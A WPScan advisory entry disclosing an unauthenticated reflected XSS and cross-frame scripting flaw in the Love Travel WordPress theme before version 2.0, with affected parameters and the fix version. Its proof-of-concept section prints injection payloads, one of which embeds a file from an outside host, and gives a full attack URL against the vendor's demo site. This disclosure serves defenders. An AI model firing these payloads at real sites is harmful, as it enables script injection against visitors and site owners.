WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

Themes Vulnerabilities

Love Travel < 2.0 - Unauthenticated Reflected XSS & XFS

Description

An Unauthenticated Reflected XSS & XFS vulnerabilities was discovered in the Love Travel theme for WordPress, affected versions: 1.0-1.9. Vulnerable parameters: nd_travel_archive_form_keyword, nd_travel_typology_slug. The issue was fixed due to a code rewrite of the theme.

Proof of Concept

[$] :: Payload(s):

"><img src=x onerror=alert(`Ex.Mi`);alert(document.domain);>

"><embed src=//ex-mi.ru/payload/xfsii.html></embed>

http://www.nicdarkthemes.com/themes/travel/wp/demo/tour-packages/search-2/?nd_travel_archive_form_keyword=%22%3E%3Cimg%20src=x%20onerror=alert(`Ex.Mi`);alert(document.domain);%3E&nd_travel_typology_slug=%22%3E%3Cimg%20src=x%20onerror=alert(`Ex.Mi`);alert(document.domain);%3E

Affects Themes

lovetravel
Fixed in version 2.0

References

URL
https://ex-mi.ru/exploit/[2020-09-09]-[WordPress]-love-travel-theme-v1.9.txt
URL
https://themeforest.net/item/love-travel-creative-travel-agency-wordpress/7704831

YouTube Video

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Ex.Mi

Submitter

Ex.Mi

Submitter website
https://ex-mi.ru/
Verified

Yes

WPVDB ID
82a42be4-38a9-4f32-8846-3f4957bb783c

Timeline

Publicly Published

2020-11-12 (about 2 years ago)

Added

2020-11-12 (about 2 years ago)

Last Updated

2020-11-14 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin